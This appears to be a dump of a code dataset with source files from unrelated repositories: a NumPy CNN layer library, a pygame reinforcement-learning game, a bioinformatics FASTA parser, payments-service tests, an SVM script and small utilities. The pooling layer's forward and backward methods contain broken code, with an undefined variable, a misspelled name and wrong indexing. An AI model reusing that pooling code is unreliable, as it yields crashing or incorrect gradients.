NotImplementedError\n\n def backward(self, out_grad, input):\n \"\"\"Backward operation, return gradient to input\"\"\"\n raise NotImplementedError\n\n\nclass relu(operation):\n def __init__(self):\n super(relu, self).__init__()\n\n def forward(self, input):\n output = np.maximum(0, input)\n return output\n\n def backward(self, out_grad, input):\n in_grad = (input >= 0) * out_grad\n return in_grad\n\n\nclass flatten(operation):\n def __init__(self):\n super(flatten, self).__init__()\n\n def forward(self, input):\n batch = input.shape[0]\n output = input.copy().reshape(batch, -1)\n return output\n\n def backward(self, out_grad, input):\n in_grad = out_grad.copy().reshape(input.shape)\n return in_grad\n\n\nclass matmul(operation):\n def __init__(self):\n super(matmul, self).__init__()\n\n def forward(self, input, weights):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, in_features)\n weights: numpy array with shape (in_features, out_features)\n\n # Returns\n output: numpy array with shape(batch, out_features)\n \"\"\"\n return np.matmul(input, weights)\n\n def backward(self, out_grad, input, weights):\n \"\"\"\n # Arguments\n out_grad: gradient to the forward output of fc layer, with shape (batch, out_features)\n input: numpy array with shape (batch, in_features)\n weights: numpy array with shape (in_features, out_features)\n\n # Returns\n in_grad: gradient to the forward input with same shape as input\n w_grad: gradient to weights, with same shape as weights \n \"\"\"\n in_grad = np.matmul(out_grad, weights.T)\n w_grad = np.matmul(input.T, out_grad)\n return in_grad, w_grad\n\n\nclass add_bias(operation):\n def __init__(self):\n super(add_bias, self).__init__()\n\n def forward(self, input, bias):\n '''\n # Arugments\n input: numpy array with shape (batch, in_features)\n bias: numpy array with shape (in_features)\n\n # Returns\n output: numpy array with shape(batch, in_features)\n '''\n return input + bias.reshape(1, -1)\n\n def backward(self, out_grad, input, bias):\n \"\"\"\n # Arguments\n out_grad: gradient to the forward output of fc layer, with shape (batch, out_features)\n input: numpy array with shape (batch, in_features)\n bias: numpy array with shape (out_features)\n # Returns\n in_grad: gradient to the forward input with same shape as input\n b_bias: gradient to bias, with same shape as bias\n \"\"\"\n in_grad = out_grad\n b_grad = np.sum(out_grad, axis=0)\n return in_grad, b_grad\n\n\nclass fc(operation):\n def __init__(self):\n super(fc, self).__init__()\n self.matmul = matmul()\n self.add_bias = add_bias()\n\n def forward(self, input, weights, bias):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, in_features)\n weights: numpy array with shape (in_features, out_features)\n bias: numpy array with shape (out_features)\n\n # Returns\n output: numpy array with shape(batch, out_features)\n \"\"\"\n output = self.matmul.forward(input, weights)\n output = self.add_bias.forward(output, bias)\n # output = np.matmul(input, weights) + bias.reshape(1, -1)\n return output\n\n def backward(self, out_grad, input, weights, bias):\n \"\"\"\n # Arguments\n out_grad: gradient to the forward output of fc layer, with shape (batch, out_features)\n input: numpy array with shape (batch, in_features)\n weights: numpy array with shape (in_features, out_features)\n bias: numpy array with shape (out_features)\n\n # Returns\n in_grad: gradient to the forward input of fc layer, with same shape as input\n w_grad: gradient to weights, with same shape as weights\n b_bias: gradient to bias, with same shape as bias\n \"\"\"\n # in_grad = np.matmul(out_grad, weights.T)\n # w_grad = np.matmul(input.T, out_grad)\n # b_grad = np.sum(out_grad, axis=0)\n out_grad, b_grad = self.add_bias.backward(out_grad, input, bias)\n in_grad, w_grad = self.matmul.backward(out_grad, input, weights)\n return in_grad, w_grad, b_grad\n\n\nclass conv(operation):\n def __init__(self, conv_params):\n \"\"\"\n # Arguments\n conv_params: dictionary, containing these parameters:\n 'kernel_h': The height of kernel.\n 'kernel_w': The width of kernel.\n 'stride': The number of pixels between adjacent receptive fields in the horizontal and vertical directions.\n 'pad': The number of pixels padded to the bottom, top, left and right of each feature map. Here, pad = 2 means a 2-pixel border of padded with zeros\n 'in_channel': The number of input channels.\n 'out_channel': The number of output channels.\n \"\"\"\n super(conv, self).__init__()\n self.conv_params = conv_params\n\n def forward(self, input, weights, bias):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, in_channel, in_height, in_width)\n weights: numpy array with shape (out_channel, in_channel, kernel_h, kernel_w)\n bias: numpy array with shape (out_channel)\n\n # Returns\n output: numpy array with shape (batch, out_channel, out_height, out_width)\n \"\"\"\n kernel_h = self.conv_params['kernel_h'] # height of kernel\n kernel_w = self.conv_params['kernel_w'] # width of kernel\n pad = self.conv_params['pad']\n stride = self.conv_params['stride']\n in_channel = self.conv_params['in_channel']\n out_channel = self.conv_params['out_channel']\n\n output = None\n\n #########################################\n\n \n batch, _, in_height, in_width = input.shape\n\n wid_out = 1+ (input.shape[3] + 2 * pad - kernel_w) // stride # 2D conv outshape\n\n hei_out = 1+ (input.shape[2] + 2 * pad - kernel_h) // stride # 2D conv outshape\n \n in_pad = np.pad(input, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant')\n \n from utils import tools\n\n img = tools.img2col(in_pad, [i*stride for i in range(hei_out)],\n [i*stride for i in range(wid_out)], kernel_h, kernel_w)\n \n output = (np.matmul(weights.reshape(out_channel, -1), img.transpose(1, 2, 0)\n .reshape(in_channel * kernel_h * kernel_w, -1)) + bias.reshape(-1, 1))\\\n .reshape(out_channel, hei_out, wid_out, batch).transpose(3, 0, 1, 2)\n \n \n\n \n #########################################\n\n return output\n\n def backward(self, out_grad, input, weights, bias):\n \"\"\"\n # Arguments\n out_grad: gradient to the forward output of conv layer, with shape (batch, out_channel, out_height, out_width)\n input: numpy array with shape (batch, in_channel, in_height, in_width)\n weights: numpy array with shape (out_channel, in_channel, kernel_h, kernel_w)\n bias: numpy array with shape (out_channel)\n\n # Returns\n in_grad: gradient to the forward input of conv layer, with same shape as input\n w_grad: gradient to weights, with same shape as weights\n b_bias: gradient to bias, with same shape as bias\n \"\"\"\n kernel_h = self.conv_params['kernel_h'] \n kernel_w = self.conv_params['kernel_w'] \n pad = self.conv_params['pad']\n stride = self.conv_params['stride']\n in_channel = self.conv_params['in_channel']\n out_channel = self.conv_params['out_channel']\n\n in_grad = None\n w_grad = None\n b_grad = None\n\n #########################################\n\n \n \n \n \n in_pad = np.pad(input, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant')\n \n wid_out = 1+ (input.shape[3] + 2 * pad - kernel_w) // stride # 2D conv outshape\n\n hei_out = 1+ (input.shape[2] + 2 * pad - kernel_h) // stride # 2D conv outshape\n\n batch, _, hei_out, wid_out = out_grad.shape\n \n p=pad\n \n from utils import tools\n \n b_grad = np.sum(out_grad, axis=(0, 2, 3))\n \n img = tools.img2col(in_pad, [i * stride for i in range(hei_out)],\n [i * stride for i in range(wid_out)], kernel_h, kernel_w)\n \n w_grad = (out_grad.transpose(1, 2, 3, 0).reshape(out_channel, -1) @ img.transpose(1, 2, 0)\n .reshape(in_channel*kernel_h*kernel_w, -1).T).reshape(weights.shape)\n\n reshape_col = weights.reshape(out_channel, -1).T @ out_grad.transpose(1, 2, 3, 0).reshape(out_channel, -1)\n\n reshape_col2 =reshape_col .reshape(in_channel * kernel_w * kernel_h, -1, batch).transpose(2, 0, 1)\n\n in_grad = np.zeros(in_pad.shape, dtype=w_grad.dtype)\n \n c = np.array([[c for c in range(in_channel) for _ in range(kernel_h * kernel_w)] for _ in range(hei_out * wid_out)])\n\n i = np.array(\n [[i * stride + k // kernel_w for _ in range(in_channel) for k in range(kernel_h * kernel_w)] for i in range(hei_out)\n for _ in range(wid_out)])\n\n j = np.array(\n [[j * stride + k % kernel_w for _ in range(in_channel) for k in range(kernel_w * kernel_h)] for _ in range(hei_out) for\n j in range(wid_out)])\n\n np.add.at(in_grad, (slice(np.newaxis), c.T, i.T, j.T), reshape_col2)\n \n \n\n \n \n #########################################\n\n return in_grad, w_grad, b_grad\n\n\nclass pool(operation):\n def __init__(self, pool_params):\n \"\"\"\n # Arguments\n pool_params: dictionary, containing these parameters:\n 'pool_type': The type of pooling, 'max' or 'avg'\n 'pool_h': The height of pooling kernel.\n 'pool_w': The width of pooling kernel.\n 'stride': The number of pixels between adjacent receptive fields in the horizontal and vertical directions.\n 'pad': The number of pixels that will be used to zero-pad the input in each x-y direction. Here, pad = 2 means a 2-pixel border of padding with zeros.\n \"\"\"\n super(pool, self).__init__()\n self.pool_params = pool_params\n\n def forward(self, input):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, in_channel, in_height, in_width)\n\n # Returns\n output: numpy array with shape (batch, in_channel, out_height, out_width)\n \"\"\"\n pool_type = self.pool_params['pool_type']\n pool_height = self.pool_params['pool_height']\n pool_width = self.pool_params['pool_width']\n stride = self.pool_params['stride']\n pad = self.pool_params['pad']\n\n output = None\n\n #########################################\n \n \n \n p=pad \n \n st=stride \n\n in_pad = np.pad(input, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant')\n \n batch, in_channel, in_height, in_width = input.shape\n\n wid_out = (input.shape[3] + 2 * p - pool_width) // st + 1\n\n hei_out = (input.shape[2] + 2 * p - pool_height) // st + 1\n \n in_grad = np.zeros_like(in_pad)\n \n pool_size = pool_height * pool_width\n \n \n for b in range(batch):\n \n for c in range(in_channel):\n \n for h in range(0, hei_out):\n \n for w in range(0, wid_out):\n \n if pool_type == 'max':\n \n output = np.max(input[b, c, h * st:h * st + pool_height, w * st:w * st + pool_width])\n \n elif pool_type == 'avg':\n \n output = out_grad[b, c, h, w]/pool_siz\n \n import itertools\n \n ip= itertools.product(range(hei_out), range(wid_out))\n\n output = np.array(list(map(lambda idx: in_pad[:, :, (idx[0] * stride):(idx[0] * stride) + pool_height,\n (idx[1] * stride):(idx[1] * stride) + pool_width],\n ip))).reshape(hei_out*wid_out, batch, in_channel, -1)\n \n if pool_type == 'max':\n output = np.max(output, axis=3).transpose(1, 2, 0).reshape(batch, in_channel, hei_out, -1)\n elif pool_type == 'avg':\n output = np.mean(output, axis=3).transpose(1, 2, 0).reshape(batch, in_channel, hei_out, -1)\n \n \n \n #########################################\n return output\n\n def backward(self, out_grad, input):\n \"\"\"\n # Arguments\n out_grad: gradient to the forward output of conv layer, with shape (batch, in_channel, out_height, out_width)\n input: numpy array with shape (batch, in_channel, in_height, in_width)\n\n # Returns\n in_grad: gradient to the forward input of pool layer, with same shape as input\n \"\"\"\n pool_type = self.pool_params['pool_type']\n pool_height = self.pool_params['pool_height']\n pool_width = self.pool_params['pool_width']\n stride = self.pool_params['stride']\n pad = self.pool_params['pad']\n\n in_grad = None\n\n #########################################\n \n p=pad \n \n st=stride \n \n in_pad = np.pad(input, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode='constant')\n \n wid_out = (input.shape[3] + 2 * p - pool_width) // st + 1\n\n hei_out = (input.shape[2] + 2 * p - pool_height) // st + 1\n \n batch, in_channel, in_height, in_width = input.shape\n \n in_grad = np.zeros_like(in_pad)\n \n pool_size = pool_height * pool_width\n \n \n for b in range(batch):\n \n for c in range(in_channel):\n \n for h in range(0, hei_out):\n \n for w in range(0, wid_out):\n \n if pool_type == 'max':\n \n input_pool = input[b, c, h*st:h*st + pool_height, w * st:w * st + pool_width] \n \n input_mask = input_pool == np.max(input_pool) \n \n in_grad[b, c, h*st:h*stride + pool_height, w * st:w * st + pool_width] += out_grad[b, c, h, w] * input_mask\n \n elif pool_type == 'avg':\n \n in_grad[b, c, h*st + pool_height, w*st + pool_width] += out_grad[b, c, h, w]/pool_siz\n \n \n \n \n #########################################\n\n return in_grad\n\n\nclass dropout(operation):\n def __init__(self, rate, training=True, seed=None):\n \"\"\"\n # Arguments\n rate: float[0, 1], the probability of setting a neuron to zero\n training: boolean, apply this layer for training or not. If for training, randomly drop neurons, else DO NOT drop any neurons\n seed: int, random seed to sample from input, so as to get mask, which is convenient to check gradients. But for real training, it should be None to make sure to randomly drop neurons\n mask: the mask with value 0 or 1, corresponding to drop neurons (0) or not (1). same shape as input\n \"\"\"\n self.rate = rate\n self.seed = seed\n self.training = training\n self.mask = None\n\n def forward(self, input):\n \"\"\"\n # Arguments\n input: numpy array with any shape\n\n # Returns\n output: same shape as input\n \"\"\"\n output = None\n if self.training:\n np.random.seed(self.seed)\n p = np.random.random_sample(input.shape)\n #########################################\n # code here\n \n self.mask = p > self.rate\n output = input * self.mask / (1 - self.rate)\n \n #########################################\n else:\n output = input\n return output\n\n def backward(self, out_grad, input):\n \"\"\"\n # Arguments\n out_grad: gradient to forward output of dropout, same shape as input\n input: numpy array with any shape\n mask: the mask with value 0 or 1, corresponding to drop neurons (0) or not (1). same shape as input\n\n # Returns\n in_grad: gradient to forward input of dropout, same shape as input\n \"\"\"\n if self.training:\n #########################################\n \n \n in_grad = out_grad * self.mask / (1 - self.rate)\n \n #########################################\n else:\n in_grad = out_grad\n return in_grad\n\n\nclass softmax_cross_entropy(operation):\n def __init__(self):\n super(softmax_cross_entropy, self).__init__()\n\n def forward(self, input, labels):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, num_class)\n labels: numpy array with shape (batch,)\n eps: float, precision to avoid overflow\n\n # Returns\n output: scalar, average loss\n probs: the probability of each category\n \"\"\"\n # precision to avoid overflow\n eps = 1e-12\n\n batch = len(labels)\n input_shift = input - np.max(input, axis=1, keepdims=True)\n Z = np.sum(np.exp(input_shift), axis=1, keepdims=True)\n\n log_probs = input_shift - np.log(Z+eps)\n probs = np.exp(log_probs)\n output = -1 * np.sum(log_probs[np.arange(batch), labels]) / batch\n return output, probs\n\n def backward(self, input, labels):\n \"\"\"\n # Arguments\n input: numpy array with shape (batch, num_class)\n labels: numpy array with shape (batch,)\n eps: float, precision to avoid overflow\n\n # Returns\n in_grad: gradient to forward input of softmax cross entropy, with shape (batch, num_class)\n \"\"\"\n # precision to avoid overflow\n eps = 1e-12\n\n batch = len(labels)\n input_shift = input - np.max(input, axis=1, keepdims=True)\n Z = np.sum(np.exp(input_shift), axis=1, keepdims=True)\n log_probs = input_shift - np.log(Z+eps)\n probs = np.exp(log_probs)\n\n in_grad = probs.copy()\n in_grad[np.arange(batch), labels] -= 1\n in_grad /= batch\n return in_grad\n","repo_name":"sangengqiuyang/CNN-MNIST","sub_path":"operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":19328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72933461033","text":"import sys\n\nimport numpy as np\nimport pygame\nfrom keras import Sequential\nfrom keras.optimizers import Adam\nfrom tensorflow import keras\n\nfrom Action import Action\nfrom Agent import Agent\nfrom CustomEnv import CustomEnv\nfrom shower import Shower\nfrom utils import TRAINED_DIR_NAME\n\nSCREEN_UPDATE = pygame.USEREVENT\n\nclass Game:\n def __init__(self):\n self.running = True\n self.env = CustomEnv()\n self.timer = pygame.time.Clock()\n\n\n # res = agent.predict(np.array([30]))\n # print(np.argmax(res[0]))\n\n def create_agent(self, trained=False):\n actions = self.env.action_space.n\n filepath = None\n states = None\n\n if trained:\n filepath = TRAINED_DIR_NAME\n else:\n states = self.env.observation_space.shape\n\n self.agent = Agent(actions=actions, states=states, filepath=filepath)\n\n def train_agent(self):\n history = self.agent.train(self.env )\n print(history.history.keys())\n\n def test_agent(self):\n self.env.create_screen()\n self.agent.test(self.env)\n\n def save_agent(self):\n self.agent.save()\n\n def run(self):\n pygame.init()\n pygame.time.set_timer(SCREEN_UPDATE, 100)\n self.env.create_screen()\n\n\n keyUpEvent = pygame.event.Event(pygame.KEYDOWN, key=pygame.K_UP, mod=pygame.KMOD_NONE)\n keyDowmEvent = pygame.event.Event(pygame.KEYDOWN, key=pygame.K_DOWN, mod=pygame.KMOD_NONE)\n count_done_base = 100\n count_done = count_done_base\n while self.running:\n for ev in pygame.event.get():\n if ev.type == pygame.QUIT:\n self.cleanup()\n\n if ev.type == pygame.KEYDOWN:\n if ev.key == pygame.K_UP:\n self.env.action(Action.INCREASE)\n elif ev.key == pygame.K_DOWN:\n self.env.action(Action.DECREASE)\n\n if ev.type == SCREEN_UPDATE or True:\n self.env.update()\n self.env.show()\n\n observations = self.env.get_observations()\n decision = self.agent.predict(observations)\n\n if decision == 0:\n pygame.event.post(keyDowmEvent)\n elif decision == 2:\n pygame.event.post(keyUpEvent)\n\n pygame.display.update()\n\n self.timer.tick(60)\n\n if self.env.shower.get_temp() >= 37 and self.env.shower.get_temp() <= 39:\n count_done -= 1\n if count_done <= 0:\n count_done = count_done_base\n self.env.reset()\n\n\n\n def cleanup(self):\n pygame.quit()\n sys.exit(0)","repo_name":"Maeglin1908/openai-gym-first","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28197109241","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : pmoma\nDate : 2019-04-11\nPurpose: CDHIT parse\n\"\"\"\n\nimport argparse\nimport sys\nimport os\nimport re\nfrom Bio import SeqIO\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get command-line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Argparse Python script',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n '-c',\n\t'--cdhit',\n help='Output file from CD-HIT (clustered proteins)',\n metavar='str',\n type=str,\n default=None,\n required=True)\n\n parser.add_argument(\n '-p',\n\t'--proteins',\n help='Proteins FASTA',\n metavar='str',\n type=str,\n default=None,\n required=True)\n\n parser.add_argument(\n '-o',\n\t'--outfile',\n help='Output file',\n metavar='str',\n type=str,\n default='unclustered.fa')\n\n return parser.parse_args()\n\n# --------------------------------------------------\ndef warn(msg):\n \"\"\"Print a message to STDERR\"\"\"\n print(msg, file=sys.stderr)\n\n# --------------------------------------------------\ndef die(msg=' '):\n \"\"\"warn() and exit with error\"\"\"\n warn(msg)\n sys.exit(1)\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n args = get_args()\n cdh = args.cdhit\n prot = args.proteins\n outf = args.outfile\n\n if not os.path.isfile(prot):\n die('--proteins \"{}\" is not a file'.format(prot))\n\n if not os.path.isfile(cdh):\n die('--cdhit \"{}\" is not a file'.format(cdh))\n\n cluster=set()\n with open(cdh, 'r') as cdhf:\n for line in cdhf:\n match=re.search(r'>gi\\|(\\d+)\\|', line)\n if match:\n cluster.add(match.group(1))\n\n outfi=open(outf, 'w')\n nuncl=0\n ntot=0\n for record in SeqIO.parse(prot, 'fasta'):\n id=record.id\n ntot+=1\n idg=re.sub('\\|.*', '', id)\n if idg not in cluster:\n nuncl+=1\n SeqIO.write(record, outfi, 'fasta')\n\n print('Wrote {:,} of {:,} unclustered proteins to \"{}\"'.format(nuncl, ntot, outf))\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n\n","repo_name":"pmoma/biosys-analytics","sub_path":"assignments/12-unclustered-proteins/find_unclustered.py","file_name":"find_unclustered.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"168543769","text":"import csv\nimport io\nimport os\n\nimport pytest\nfrom library.python import resource\n\nfrom mail.payments.payments.core.actions.order.create_from_multi import (\n CreateOrderFromMultiOrderAction, CreateOrderFromMultiOrderServiceMerchantAction, DownloadMultiOrderEmailListAction\n)\nfrom mail.payments.payments.core.entities.enums import OrderKind, PayStatus, RefundStatus\nfrom mail.payments.payments.core.entities.order import Order\nfrom mail.payments.payments.core.exceptions import OrdersAmountExceed\nfrom mail.payments.payments.tests.base import BaseTestOrderAction\nfrom mail.payments.payments.utils.helpers import create_csv_writer, temp_setattr\n\n\nclass TestCreateOrderFromMultiOrderAction(BaseTestOrderAction):\n @pytest.fixture(params=('uid', 'service_merchant'))\n def params(self, merchant, multi_order, service_client, service_merchant, request):\n data = {\n 'uid': {'uid': merchant.uid},\n 'service_merchant': {\n 'service_tvm_id': service_client.tvm_id,\n 'service_merchant_id': service_merchant.service_merchant_id\n }\n }\n\n params = {\n 'order_id': multi_order.order_id,\n **data[request.param]\n }\n\n return params\n\n @pytest.fixture\n def action(self, params):\n service_action = bool(params.get('service_merchant_id'))\n if service_action:\n return CreateOrderFromMultiOrderServiceMerchantAction(**params)\n else:\n return CreateOrderFromMultiOrderAction(**params)\n\n @pytest.fixture\n def returned_func(self, action):\n async def _inner():\n return await action.run()\n\n return _inner\n\n @pytest.fixture\n async def returned(self, returned_func):\n return await returned_func()\n\n @pytest.fixture\n async def created_order(self, storage, returned):\n return await storage.order.get(returned.uid, returned.order_id)\n\n @pytest.fixture\n async def created_items(self, storage, returned):\n return [\n item\n async for item in storage.item.get_for_order(returned.uid, returned.order_id)\n ]\n\n @pytest.fixture\n async def multi_order_items(self, storage, multi_order):\n return [\n item\n async for item in storage.item.get_for_order(multi_order.uid, multi_order.order_id)\n ]\n\n def test_created_order(self, returned, multi_order, created_order):\n assert all((\n returned.revision == created_order.revision,\n returned.parent_order_id == multi_order.order_id,\n ))\n\n def test_created_order_service_client_id(self, service_client, params, created_order):\n service_client_id = service_client.service_client_id if 'service_tvm_id' in params else None\n assert created_order.service_client_id == service_client_id\n\n def test_created_order_service_merchant_id(self, params, created_order):\n assert created_order.service_merchant_id == params.get('service_merchant_id')\n\n def test_created_items(self, returned, items_data, multi_order_items, created_items):\n for item in multi_order_items:\n item.order_id = returned.order_id\n assert created_items == multi_order_items\n\n class TestMaxAmount:\n @pytest.fixture\n def order_data_data(self):\n return {\n 'multi_issued': 1,\n 'multi_max_amount': 1\n }\n\n @pytest.mark.asyncio\n async def test_max_amount(self, returned_func):\n with pytest.raises(OrdersAmountExceed):\n await returned_func()\n\n\nclass TestDownloadMultiOrderEmailListAction:\n @pytest.fixture\n def orders_data(self):\n return [\n {\n 'kind': OrderKind.MULTI,\n 'pay_status': None,\n 'user_email': 'das@yandex.ru',\n },\n {\n 'kind': OrderKind.PAY,\n 'pay_status': PayStatus.NEW,\n 'parent_order_id': 1,\n 'user_email': 'asd@yandex.ru',\n },\n {\n 'kind': OrderKind.PAY,\n 'pay_status': PayStatus.PAID,\n 'parent_order_id': 1,\n 'user_email': 'sad@yandex.ru',\n },\n {\n 'kind': OrderKind.REFUND,\n 'pay_status': None,\n 'refund_status': RefundStatus.COMPLETED,\n 'original_order_id': 3,\n 'parent_order_id': 1,\n 'user_email': 'ads@yandex.ru',\n },\n {\n 'kind': OrderKind.PAY,\n 'pay_status': PayStatus.NEW,\n 'user_email': 'dsa@yandex.ru',\n },\n {\n 'kind': OrderKind.PAY,\n 'pay_status': PayStatus.PAID,\n 'parent_order_id': 1,\n 'user_email': 'sda@yandex.ru',\n },\n ]\n\n @pytest.fixture\n async def orders(self, storage, merchant, shop, orders_data):\n created = []\n for order_data in orders_data:\n order_data.setdefault('uid', merchant.uid)\n order_data.setdefault('shop_id', shop.shop_id)\n order = await storage.order.create(Order(**order_data))\n created.append(order)\n return created\n\n @pytest.fixture\n def params(self, merchant):\n return {\n 'uid': merchant.uid,\n 'order_id': 1,\n }\n\n @pytest.fixture\n async def csv_returned(self, storage, params):\n output = io.StringIO()\n with temp_setattr(DownloadMultiOrderEmailListAction.context, 'storage', storage):\n for row in await DownloadMultiOrderEmailListAction(**params)._create_csv():\n print(row.decode('utf-8'), file=output, end='')\n return output\n\n @pytest.fixture\n async def returned(self, storage, params):\n return await DownloadMultiOrderEmailListAction(**params).run()\n\n @pytest.fixture\n def header(self):\n return [\"Номер строки\", \"Email\", \"Оформлен возврат\"]\n\n @pytest.fixture\n def expected_csvfile(self, header):\n writer, output = create_csv_writer()\n writer.writerow(header)\n return output\n\n @pytest.fixture\n def expected_email_list_file(self, root):\n report_path = os.path.join('resfs', 'file', 'tests', 'unit', 'data', 'email_list.csv')\n return resource.find(report_path).decode('utf-8').split('\\n')\n\n def strip_csv(self, file_):\n return sorted([row[1:] for row in csv.reader(file_)])\n\n @pytest.mark.asyncio\n async def test_create_csv(self, storage, orders, csv_returned, expected_email_list_file):\n csv_returned.seek(0)\n assert self.strip_csv(expected_email_list_file) == self.strip_csv(csv_returned)\n\n @pytest.mark.asyncio\n async def test_header(self, csv_returned, expected_csvfile):\n assert csv_returned.getvalue() == expected_csvfile.getvalue()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/unit/core/actions/order/test_create_from_multi.py","file_name":"test_create_from_multi.py","file_ext":"py","file_size_in_byte":6971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"106310797","text":"\"\"\"\n=========\nSVM Train\n=========\n\nTrains an SVM model using some fixed parameters.\nYou can edit the configuration part of this file to\nchange the parameter values.\n\"\"\"\nfrom __future__ import division, print_function\n\n# Author: Alvaro Barbero\n#\n# License: Free BSD\n#\n\nimport sys\nfrom sklearn import svm\nfrom scipy import io\n\n### CONFIG: edit here to change model parameters ###\n\n# Type of kernel. Kernels available: \"linear\", \"poly\", \"rbf\"\nkernel = \"linear\"\n# C regularization parameter\nC = 10\n# RBF kernel width \ngamma = 0.01\n# Polynomial kernel degree\ndegree = 3\n# Polynomial kernel zero coefficient\ncoef0 = 0\n# Name of the dataset file to load\ndata_file = \"data/thyroid.mat\"\n\n### CONFIG END ###\n\ndef main(argv):\n # Load dataset\n data = io.loadmat(data_file)\n # Train model\n model = train(data['X'], data['y'])\n \n # Compute accuracy over test set\n acc = accuracy(model, data['Xtest'], data['ytest'])\n \n # Print accuracy result\n print(\"Accuracy:\", acc)\n\n# Trains an SVM model with the given data and the configuration parameters\ndef train(X, y):\n # Create SVM model\n model = svm.SVC(kernel=kernel, C=C, gamma=gamma, coef0=coef0, degree=degree)\n # Train model\n model.fit(X, y.ravel())\n # Return trained model\n return model\n \n# Returns the accuracy of the model for some given data\ndef accuracy(model, X, y):\n return model.score(X, y) * 100\n \nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"jorloplaz/teaching_material","sub_path":"SVM/svmGUI/svm_train.py","file_name":"svm_train.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28104637614","text":"from django.core import mail\nfrom django.template.loader import render_to_string\n\n\ndef render_mail(template_prefix, email, context):\n subject = render_to_string('{0}_subject.txt'.format(template_prefix),\n context)\n # remove superfluous line breaks\n subject = \" \".join(subject.splitlines()).strip()\n\n template_name = '{0}_message.{1}'.format(template_prefix, 'html')\n body = render_to_string(template_name,\n context).strip()\n\n msg = mail.EmailMessage(subject=subject,\n body=body,\n to=[email])\n msg.content_subtype = 'html'\n return msg\n","repo_name":"favourch/coretabs-academy","sub_path":"src/api/profiles/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34584874605","text":"import unittest\n\nimport pygame as pg\nimport cv2\nimport numpy as np\nfrom fluentcheck import Is\n\nimport palette_creator\nimport picture_converter\n\n\nclass PaletteCreatorCase(unittest.TestCase):\n def test_get_palette_should_contains_all_symbols(self):\n pg.init()\n font = pg.font.SysFont('arial', 5)\n pal, coeff = palette_creator.get_color_palette('123', 3, font)\n Is(pal).dict.has_keys(*['1', '2', '3'])\n\n def test_get_palette_should_contains_expected_count_color(self):\n pg.init()\n font = pg.font.SysFont('arial', 5)\n pal, coeff = palette_creator.get_color_palette('123', 3, font)\n for i in pal.values():\n self.assertEqual(27, len(i))\n\n\nclass PictureConverterCase(unittest.TestCase):\n def setUp(self) -> None:\n pg.init()\n self.font = pg.font.SysFont('arial', 5)\n self.test_image = []\n for x in range(800):\n self.test_image.append([])\n for y in range(500):\n for p in range(3):\n self.test_image[x].append([])\n self.test_image[x][y].append([1, 2, 3])\n self.test_image = np.array(self.test_image)\n\n def test_convert_should_be_expected_size(self):\n res = picture_converter.convert_to_asciiart(cv2.imread('./images/example.jpg'), ' 211654561984562', 3, self.font, 1, (50, 50))\n self.assertEqual((res.shape[1], res.shape[0]), (50, 50))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ivanarray/asciiart","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73463192552","text":"import win32com.client\nimport time\n\npowerpoint = win32com.client.Dispatch(\"Powerpoint.Application\")\ntry:\n # Attempt to open file\n #presentation = powerpoint.Presentations.Open(FileName='lol.pptx', WithWindow=False)\n presentation = powerpoint.Presentations.Open(FileName=r'C:\\Users\\tomd\\Development\\PPPTX2MP4\\lol.pptx')\nexcept:\n # If file cannot be found\n print('File cannot be found')\n exit\n\ntry:\n # May need a few other parameters as well\n presentation.CreateVideo(r'C:\\Users\\tomd\\Development\\PPPTX2MP4\\out.wmv')\n while presentation.CreateVideoStatus == 1:\n time.sleep(1)\n presentation.Close()\n print('Done')\nexcept:\n print('Unable to export to video')","repo_name":"tomjdickson/PPTX2MP4","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"2705926617","text":"from botocore.exceptions import ClientError\n\nfrom CoreApp.Controllers.DatabaseObjects.userprofile_manage import get_user_id\nfrom CoreApp.Controllers.DatabaseObjects.table_objects import restaurant_review_table as restaurant_review_table\nimport json\nimport boto3\n\ndynamo_db = boto3.resource('dynamodb')\n\n# sample restaurant review record\n'''\n{\n \"RESTAURANT_ID\" : \"REST123\",\n \"ITEMS\" : [{\"ITEM_NAME\" : \"DOSA\" , \"ITEM_LIKE_COUNT\" : 100, \"ITEM_DISLIKE_COUNT\" : 23},\n {\"ITEM_NAME\" : \"IDLY\" , \"ITEM_LIKE_COUNT\" : 200, \"ITEM_DISLIKE_COUNT\" : 43},\n {\"ITEM_NAME\" : \"POORI\" , \"ITEM_LIKE_COUNT\" : 150, \"ITEM_DISLIKE_COUNT\" : 